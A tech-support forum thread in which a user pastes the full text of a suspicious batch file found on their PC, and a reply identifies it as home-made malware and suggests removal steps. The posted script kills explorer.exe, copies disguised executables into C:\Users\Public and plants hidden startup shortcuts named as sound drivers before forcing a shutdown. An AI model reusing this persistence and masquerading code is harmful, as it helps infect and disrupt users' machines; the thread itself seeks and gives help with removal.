How to remove this .bat file which resets every software in my pc?

Status
Not open for further replies.

Aman Tiwari

Reputable
Oct 7, 2014
3
0
4,510
i'm having a problem in my pc,it seems to be a virus but no idea what it actually is,it appears as a shortcut to some existing folders* not any file ,but when i checked its properties its actually a .bat file and on opening it with notepad,there was following stuff which i saw (and to mention there are two exe apps namely"smss & taskeng" and if i click on these two the computer shuts down)-->
/*
path C:\Windows\System32
color fa
IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe
xcopy /h /y "smss .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public")
IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public")
IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3
IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4
:3
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Driver.lnk" -h -s
copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Driver.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s
shutdown /s /f /t 0
)
goto e
:4
IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" (
ECHO "hur"
) ELSE (
attrib "Sound_Drivers.lnk" -h -s
copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib "Sound_Drivers.lnk" +h +s
attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s
shutdown /s /f /t 0
)
:e
*/


Help me out people,i'm quite troubled with this thing!
 
Solution
Interesting bit of coding...

I'm guessing that's a home-made bit of malware. Have you had anyone mess with your PC recently?

Boot off a Linux LiveCD/USB, delete the stuff in Publice, and delte the batch file. Then run a good antivirus, eg. Malwarebytes.

Also:
Status
Not open for further replies.